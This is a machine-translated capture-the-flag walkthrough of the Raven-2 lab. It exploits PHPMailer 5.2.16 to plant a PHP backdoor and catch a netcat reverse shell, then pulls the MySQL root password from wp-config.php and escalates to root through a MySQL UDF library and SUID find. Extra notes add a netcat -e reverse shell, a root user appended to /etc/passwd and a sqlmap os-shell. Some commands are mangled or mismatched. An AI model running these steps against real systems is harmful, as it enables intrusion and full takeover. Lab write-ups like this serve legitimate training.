[original] project III Raven-2

Actual combat process

1. Scan segment C and find that the target ip is

nmap -sP

Scan target host full port

nmap -p-

Access the page for port 80

2. Catalog blasting


Enumeration found the directory:
==> DIRECTORY: The second directory gets the flag:


Enumeration to get information: PHPMailer
Enumeration for information: 5.2.16
Find EXP at this time!

4. Google: PHPMailer 5.2.16 exp
Click the first item to find: https://www.exploit-db.com/exploits/40974

searchsploit 40974
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /home/whoami/poc

Test exp and modify the parameters for PHPMailer:

41 Line: change the address:
42 Line: back door Name:/heiyu.php
44 Line: change the springback IP And port  6666
47 Line: write down shell Directory of:/var/www/html/heiyu.php

5. Execute exp

python3 40974.py


If the environment reports an error, install according to the environment:
Requests needs to be installed_ For the toolkit module, use the command: PIP install requests toolkit. If pip is not used, sudo apt get install Python pip is required.

access , the backdoor file heiyu PHP

Enable local listening: nc -vlp 6666

Get bounce shell!

python -c 'import pty;pty.spawn("/bin/bash")'

6. Find flag

find / -name flag*

Two flag s found! Read:

cat /var/www/flag2.txt

Get flag3!

7. wordpress directory enumeration
The wordpress directory is found under the flag3 directory, and then enumeration is performed

grep "content" -rn 
grep "password" -rn wp-config.php

Enter view

define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
obtain mysql Account and password information!

View mysql process information

ps aux | grep root

View historical installation package versions
dpkg -l | grep mysql 

mysql is run with root permission. Next, find the method of mysql authorization

8. mysql UDF authorization
UDF and MOF are very classic methods for raising rights!

mysql -uroot -pR@v3nSecurity 
select version();  ---View version

show databases;
use wordpress
show tables;
select * from wp_users;
michael: $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven: B6X3H3ykawf2oHuPsbjQiih5iJXqad.

First, check whether the write conditions are met:

show global variables like 'secure%';

1) When secure_ File_ The value of priv is NULL, which means that mysqld is restricted from importing and exporting, and the right cannot be raised at this time
2) When secure_ File_ The value of priv is /tmp/, which means that the import and export of mysqld can only occur in the /tmp/ directory, and the authorization cannot be raised at this time
3) When secure_ File_ When the priv value has no specific value, it means that the import and export of mysqld will not be restricted. In this case, the right can be raised!
For MySQL > = version 5.1, you must place the dynamic link library file of UDF under the lib\plugin folder under the MySQL installation directory to create a custom function.

To view the plug-in Directory:

show variables like '%plugin%';

Check whether you can log in remotely:

use mysql;
select user,host from user;

It is found that the root user here is not allowed to log in remotely, so MSF can not be used for authorization.

Google search: MySQL 5 X UDF exploit or searchsploit udf


searchsploit 1518.c
cp /usr/share/exploitdb/exploits/linux/local/1518.c /home/whoami/poc

exp compilation execution

gcc -g -c 1518.c   ---GCC compile.o file
gcc -g -shared -o heiyu.so 1518.o -lc

The attacker starts the http service

The target machine enters the tmp directory and downloads heiyu So file

show databases;
use mysql
select database();
Enter database to create data table heiyu: 
create table heiyu(line blob);
View the table;
desc heiyu;
Insert data file:
insert into heiyu values(load_file('/tmp/heiyu.so'));

The heiyu table successfully inserts binary data, and then uses the dumpfile function to export the file. outfile is exported in multiple rows, and dumpfile is exported in one row. outfile will have special conversion, and dumpfile is the original data export!

New storage function:

select * from heiyu into dumpfile '/usr/lib/mysql/plugin/heiyu.so';

Create custom function do_system, type integer, alias (soname) file name, and then query whether the function is created successfully:

create function do_system returns integer soname 'heiyu.so';

View the following created functions:

select * from mysql.func;

Call do_ The system function gives the owner of the find command suid permission to execute the root command:

select do_system('chmod u+s /usr/bin/find');

Execute the find command
Execute shell using find

touch heiyu
find heiyu -exec "/bin/sh" \;
Or: find heiyu -exec "id" \;
cd /root
cat flag4.txt

Expand knowledge points

Expand knowledge points: or use sys_exec,sys_eval

select do_system('nc -nv 6677 -e /bin/bash');

openssl passwd heiyu
select do_system('echo "dayu:xFzxgAbLwwOOA:0:0:root:/root:/bin/bash" >> /etc/passwd');
su heiyu

Only/bin/bash Mode:
python -c 'import pty;pty.spawn("/bin/bash")'
Ctl z
stty raw -echo
cewl -w user.txt
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git
cd CVE-2018-15473-Exploit/

pip3 install -r requirements.txt
proxychains pip3 install --upgrade paramiko==2.4.1
If remote:
sqlmap -d "mysql://root:root@" --os-shell


Tags: penetration test

Posted by signer on Tue, 31 May 2022 09:45:33 +0530